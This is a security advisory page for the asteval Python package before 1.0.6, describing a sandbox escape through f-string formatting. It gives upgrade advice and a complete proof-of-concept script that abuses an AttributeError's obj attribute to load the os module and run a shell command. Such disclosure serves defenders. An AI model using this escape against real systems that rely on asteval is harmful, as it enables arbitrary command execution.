Exposed Dangerous Method or Function Affecting asteval package, versions [,1.0.6)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-ASTEVAL-8663233
- published26 Jan 2025
- disclosed24 Jan 2025
- creditSteakEnthusiast
Introduced: 24 Jan 2025
NewCVE-2025-24359 (opens in a new tab)How to fix?
Upgrade asteval to version 1.0.6 or higher.
Overview
asteval is a Safe, minimalistic evaluator of python expression using ast module
Affected versions of this package are vulnerable to Exposed Dangerous Method or Function through the on_formattedvalue function. An attacker can manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val) to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.
PoC
from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
# ga
def pwn():
try:
f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
except Exception as ga:
ga = ga.obj
sub = ga(dict.mro()[1],"__subclasses__")()
importer = None
for i in sub:
if "BuiltinImporter" in str(i):
importer = i.load_module
break
os = importer("os")
os.system("whoami")
# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works
pwn()
"""
aeval(code)